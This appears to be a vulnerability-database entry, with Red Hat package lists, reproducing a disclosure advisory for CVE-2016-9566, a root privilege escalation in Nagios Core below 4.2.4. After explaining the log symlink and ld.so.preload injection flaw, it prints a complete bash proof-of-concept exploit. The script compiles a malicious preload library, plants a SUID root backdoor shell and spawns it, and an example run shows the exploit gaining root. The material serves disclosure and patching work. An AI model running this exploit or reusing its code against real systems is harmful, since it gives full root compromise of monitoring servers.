    idRHSA-2017:0258
  • rhsa
    idRHSA-2017:0259
rpms
  • nagios-0:3.5.1-9.el7
  • nagios-common-0:3.5.1-9.el7
  • nagios-debuginfo-0:3.5.1-9.el7
  • nagios-devel-0:3.5.1-9.el7
  • nagios-0:3.5.1-9.el6
  • nagios-common-0:3.5.1-9.el6
  • nagios-debuginfo-0:3.5.1-9.el6
  • nagios-devel-0:3.5.1-9.el6
  • nagios-0:3.5.1-9.el7
  • nagios-common-0:3.5.1-9.el7
  • nagios-debuginfo-0:3.5.1-9.el7
  • nagios-0:3.5.1-9.el7
  • nagios-common-0:3.5.1-9.el7
  • nagios-debuginfo-0:3.5.1-9.el7
  • nagios-0:3.5.1-9.el7
  • nagios-common-0:3.5.1-9.el7
  • nagios-debuginfo-0:3.5.1-9.el7
  • nagios-0:3.5.1-9.el6
  • nagios-common-0:3.5.1-9.el6
  • nagios-debuginfo-0:3.5.1-9.el6
  • nagios-devel-0:3.5.1-9.el6

Seebug

bulletinFamilyexploit
descriptionINTRODUCTION ------------------------- Nagios Core daemon in versions below 4.2.4 was found to perform unsafe operations when handling the log file. This could be exploited by malicious local attackers to escalate their privileges from 'nagios' system user, or from a user belonging to 'nagios' group, to root. The exploit could enable the attackers to fully compromise the system on which a vulnerable Nagios version was installed. To obtain the necessary level of access, the attackers could use another Nagios vulnerability discovered by the author of this advisory - CVE-2016-9565 which has been linked in the references. DESCRIPTION ------------------------- Default installation of Nagios Core creates the log directory with the following permissions: ``` drwxrwsr-x 5 nagios nagios ``` Nagios daemon was found to open the log file before dropping its root privileges on startup: ``` 8148 open("/usr/local/nagios/var/nagios.log", O_RDWR|O_CREAT|O_APPEND, 0666) = 4 8148 fcntl(4, F_SETFD, FD_CLOEXEC) = 0 8148 fchown(4, 1001, 1001) = 0 8148 getegid() = 0 8148 setgid(1001) = 0 8148 geteuid() = 0 [...] ``` If an attacker managed to gain access to an account of 'nagios' or any other account belonging to the 'nagios' group, they would be able to replace the log file with a symlink to an arbitrary file on the system. This vulnerability could be used by an attacker to escalate their privileges from nagios user/group to root for example by creating a malicious /etc/ld.so.preload file. The file would be created with the following nagios permissions due to the fchown operation shown above: ``` -rw-r--r-- 1 nagios nagios 950 Dec 10 11:56 /etc/ld.so.preload ``` which would enable write access to the file for the 'nagios' user but not the 'nagios' group. Gaining write access to ld.so.preload as 'nagios' group If the attacker managed to exploit the CVE-2016-9565 vulnerability explained at: https://legalhackers.com/advisories/Nagios-Exploit-Command-Injection-CVE-2016-9565-2008-4796.html they would gain access to www-data account belonging to 'nagios' group in case of a default Nagios install following the official Nagios setup guide: https://assets.nagios.com/downloads/nagioscore/docs/Installing_Nagios_Core_From_Source.pdf This would not be enough to write to ld.so.preload file as 'nagios' group is only allowed to read the log file. Attackers with access to 'nagios' group could however bypass the lack of write privilege by writing to Nagios external command pipe (nagios.cmd) which is writable by 'nagios' group by default: ``` prw-rw---- 1 nagios nagios 0 Dec 10 19:39 nagios.cmd ``` The Nagios command pipe allows to communicate with Nagios daemon. By sending an invalid command to the pipe, the attacker could bypass the lack of write permission and inject data to the log file (pointing to ld.so.preload). For example, by running the command: ``` /usr/bin/printf "[%lu] NAGIOS_GIVE_ME_ROOT_NOW!;; /tmp/nagios_privesc_lib.so \n" `date +%s` > /usr/local/nagios/var/rw/nagios.cmd ``` Nagios daemon would append the following line to the log file: ``` [1481439996] Warning: Unrecognized external command -> NAGIOS_GIVE_ME_ROOT_NOW!;; /tmp/nagios_privesc_lib.so ``` which would be enough to load a malicious library and escalate the privileges from a www-data user (belonging to 'nagios' group) to root upon a Nagios restart. #### Forcing restart of Nagios daemon Attackers could speed up the restart by using the Nagios command pipe once again to send a SHUTDOWN_PROGRAM command as follows: ``` /usr/bin/printf "[%lu] SHUTDOWN_PROGRAM\n" `date +%s` > /usr/local/nagios/var/rw/nagios.cmd ``` V. PROOF OF CONCEPT EXPLOIT ------------------------- -----------[ nagios-root-privesc.sh ]-------------- ``` #!/bin/bash # # Nagios Core < 4.2.4 Root Privilege Escalation PoC Exploit # nagios-root-privesc.sh (ver. 1.0) # # CVE-2016-9566 # # Discovered and coded by: # # Dawid Golunski # dawid[at]legalhackers.com # # https://legalhackers.com # # Follow https://twitter.com/dawid_golunski for updates on this advisory # # # [Info] # # This PoC exploit allows privilege escalation from 'nagios' system account, # or an account belonging to 'nagios' group, to root (root shell). # Attackers could obtain such an account via exploiting another vulnerability, # e.g. CVE-2016-9565 linked below. # # [Exploit usage] # # ./nagios-root-privesc.sh path_to_nagios.log # # # See the full advisory for details at: # https://legalhackers.com/advisories/Nagios-Exploit-Root-PrivEsc-CVE-2016-9566.html # # Video PoC: # https://legalhackers.com/videos/Nagios-Exploit-Root-PrivEsc-CVE-2016-9566.html # # CVE-2016-9565: # https://legalhackers.com/advisories/Nagios-Exploit-Command-Injection-CVE-2016-9565-2008-4796.html # # Disclaimer: # For testing purposes only. Do no harm. # BACKDOORSH="/bin/bash" BACKDOORPATH="/tmp/nagiosrootsh" PRIVESCLIB="/tmp/nagios_privesc_lib.so" PRIVESCSRC="/tmp/nagios_privesc_lib.c" SUIDBIN="/usr/bin/sudo" commandfile='/usr/local/nagios/var/rw/nagios.cmd' function cleanexit { # Cleanup echo -e "\n[+] Cleaning up..." rm -f $PRIVESCSRC rm -f $PRIVESCLIB rm -f $ERRORLOG touch $ERRORLOG if [ -f /etc/ld.so.preload ]; then echo -n > /etc/ld.so.preload fi echo -e "\n[+] Job done. Exiting with code $1 \n" exit $1 } function ctrl_c() { echo -e "\n[+] Ctrl+C pressed" cleanexit 0 } #intro echo -e "\033[94m \nNagios Core - Root Privilege Escalation PoC Exploit (CVE-2016-9566) \nnagios-root-privesc.sh (ver. 1.0)\n" echo -e "Discovered and coded by: \n\nDawid Golunski \nhttps://legalhackers.com \033[0m" # Priv check echo -e "\n[+] Starting the exploit as: \n\033[94m`id`\033[0m" id | grep -q nagios if [ $? -ne 0 ]; then echo -e "\n[!] You need to execute the exploit as 'nagios' user or 'nagios' group ! Exiting.\n" exit 3 fi # Set target paths ERRORLOG="$1" if [ ! -f "$ERRORLOG" ]; then echo -e "\n[!] Provided Nagios log path ($ERRORLOG) doesn't exist. Try again. E.g: \n" echo -e "./nagios-root-privesc.sh /usr/local/nagios/var/nagios.log\n" exit 3 fi # [ Exploitation ] trap ctrl_c INT # Compile privesc preload library echo -e "\n[+] Compiling the privesc shared library ($PRIVESCSRC)" cat <<_solibeof_>$PRIVESCSRC #define _GNU_SOURCE #include <stdio.h> #include <sys/stat.h> #include <unistd.h> #include <dlfcn.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> uid_t geteuid(void) { static uid_t (*old_geteuid)(); old_geteuid = dlsym(RTLD_NEXT, "geteuid"); if ( old_geteuid() == 0 ) { chown("$BACKDOORPATH", 0, 0); chmod("$BACKDOORPATH", 04777); unlink("/etc/ld.so.preload"); } return old_geteuid(); } _solibeof_ /bin/bash -c "gcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl" if [ $? -ne 0 ]; then echo -e "\n[!] Failed to compile the privesc lib $PRIVESCSRC." cleanexit 2; fi # Prepare backdoor shell cp $BACKDOORSH $BACKDOORPATH echo -e "\n[+] Backdoor/low-priv shell installed at: \n`ls -l $BACKDOORPATH`" # Safety check if [ -f /etc/ld.so.preload ]; then echo -e "\n[!] /etc/ld.so.preload already exists. Exiting for safety." exit 2 fi # Symlink the Nagios log file rm -f $ERRORLOG && ln -s /etc/ld.so.preload $ERRORLOG if [ $? -ne 0 ]; then echo -e "\n[!] Couldn't remove the $ERRORLOG file or create a symlink." cleanexit 3 fi echo -e "\n[+] The system appears to be exploitable (writable logdir) ! :) Symlink created at: \n`ls -l $ERRORLOG`" { # Wait for Nagios to get restarted echo -ne "\n[+] Waiting for Nagios service to get restarted...\n" echo -n "Do you want to shutdown the Nagios daemon to speed up the restart process? ;) [y/N] " read THE_ANSWER if [ "$THE_ANSWER" = "y" ]; then /usr/bin/printf "[%lu] SHUTDOWN_PROGRAM\n" `date +%s` > $commandfile fi sleep 3s ps aux | grep -v grep | grep -i 'bin/nagios' if [ $? -ne 0 ]; then echo -ne "\n[+] Nagios stopped. Shouldn't take long now... ;)\n" fi while :; do sleep 1 2>/dev/null if [ -f /etc/ld.so.preload ]; then rm -f $ERRORLOG break; fi done echo -e "\n[+] Nagios restarted. The /etc/ld.so.preload file got created with the privileges: \n`ls -l /etc/ld.so.preload`" # /etc/ld.so.preload should be owned by nagios:nagios at this point with perms: # -rw-r--r-- 1 nagios nagios # Only 'nagios' user can write to it, but 'nagios' group can not. # This is not ideal as in scenarios like CVE-2016-9565 we might be running as www-data:nagios user. # We can bypass the lack of write perm on /etc/ld.so.preload by writing to Nagios external command file/pipe # nagios.cmd, which is writable by 'nagios' group. We can use it to send a bogus command which will # inject the path to our privesc library into the nagios.log file (i.e. the ld.so.preload file :) sleep 3s # Wait for Nagios to create the nagios.cmd pipe if [ ! -p $commandfile ]; then echo -e "\n[!] Nagios command pipe $commandfile does not exist!" exit 2 fi echo -e "\n[+] Injecting $PRIVESCLIB via the pipe nagios.cmd to bypass lack of write perm on ld.so.preload" now=`date +%s` /usr/bin/printf "[%lu] NAGIOS_GIVE_ME_ROOT_NOW!;; $PRIVESCLIB \n" $now > $commandfile sleep 1s grep -q "$PRIVESCLIB" /etc/ld.so.preload if [ $? -eq 0 ]; then echo -e "\n[+] The /etc/ld.so.preload file now contains: \n`cat /etc/ld.so.preload | grep "$PRIVESCLIB"`" else echo -e "\n[!] Unable to inject the lib to /etc/ld.so.preload" exit 2 fi } 2>/dev/null # Escalating privileges via the SUID binary (e.g. /usr/bin/sudo) echo -e "\n[+] Triggering privesc code from $PRIVESCLIB by executing $SUIDBIN SUID binary" sudo 2>/dev/null >/dev/null # Check for the rootshell ls -l $BACKDOORPATH | grep rws | grep -q root 2>/dev/null if [ $? -eq 0 ]; then echo -e "\n[+] Rootshell got assigned root SUID perms at: \n`ls -l $BACKDOORPATH`" echo -e "\n\033[94mGot root via Nagios!\033[0m" else echo -e "\n[!] Failed to get root: \n`ls -l $BACKDOORPATH`" cleanexit 2 fi # Use the rootshell to perform cleanup that requires root privileges $BACKDOORPATH -p -c "rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB" rm -f $ERRORLOG echo > $ERRORLOG # Execute the rootshell echo -e "\n[+] Nagios pwned. Spawning the rootshell $BACKDOORPATH now\n" $BACKDOORPATH -p -i # Job done. cleanexit 0 ``` #### Example run ``` www-data@debjessie:/tmp$ ./nagios-root-privesc.sh /usr/local/nagios/var/nagios.log ./nagios-root-privesc.sh /usr/local/nagios/var/nagios.log Nagios Core - Root Privilege Escalation PoC Exploit (CVE-2016-9566) nagios-root-privesc.sh (ver. 1.0) Discovered and coded by: Dawid Golunski https://legalhackers.com [+] Starting the exploit as: uid=33(www-data) gid=33(www-data) groups=33(www-data),1001(nagios),1002(nagcmd) [+] Compiling the privesc shared library (/tmp/nagios_privesc_lib.c) [+] Backdoor/low-priv shell installed at: -rwxrwxrwx 1 root root 1029624 Dec 11 08:44 /tmp/nagiosrootsh [+] The system appears to be exploitable (writable logdir) ! :) Symlink created at: lrwxrwxrwx 1 www-data nagios 18 Dec 11 08:44 /usr/local/nagios/var/nagios.log -> /etc/ld.so.preload [+] Waiting for Nagios service to get restarted... Do you want to shutdown the Nagios daemon to speed up the restart process? ;) [y/N] y [+] Nagios stopped. Shouldn't take long now... ;) [+] Nagios restarted. The /etc/ld.so.preload file got created with the privileges: -rw-r--r-- 1 nagios nagios 871 Dec 11 08:44 /etc/ld.so.preload [+] Injecting /tmp/nagios_privesc_lib.so via the pipe nagios.cmd to bypass lack of write perm on ld.so.preload [+] The /etc/ld.so.preload file now contains: [1481463869] Warning: Unrecognized external command -> NAGIOS_GIVE_ME_ROOT_NOW!;; /tmp/nagios_privesc_lib.so [+] Triggering privesc code from /tmp/nagios_privesc_lib.so by executing /usr/bin/sudo SUID binary [+] Rootshell got assigned root SUID perms at: -rwsrwxrwx 1 root root 1029624 Dec 11 08:44 /tmp/nagiosrootsh Got root via Nagios! [+] Nagios pwned. Spawning the rootshell /tmp/nagiosrootsh now nagiosrootsh-4.3# exit exit [+] Cleaning up... [+] Job done. Exiting with code 0 ``` #### Video PoC: https://legalhackers.com/videos/Nagios-Exploit-Root-PrivEsc-CVE-2016-9566.html BUSINESS IMPACT ------------------------- An attacker who has managed to gain access to 'nagios' account, or an account belonging to 'nagios' group (which is the case in the CVE-2016-9565 scenario) to escalate their privileges to root and fully compromise the Nagios monitoring server.
idSSV:92575
last seen2017-11-19
modified2016-12-16
published2016-12-16
reporterRoot
sourcehttps://www.seebug.org/vuldb/ssvid-92575
titleNagios Core < 4.2.4 - Root Privilege Escalation (CVE-2016-9566)

References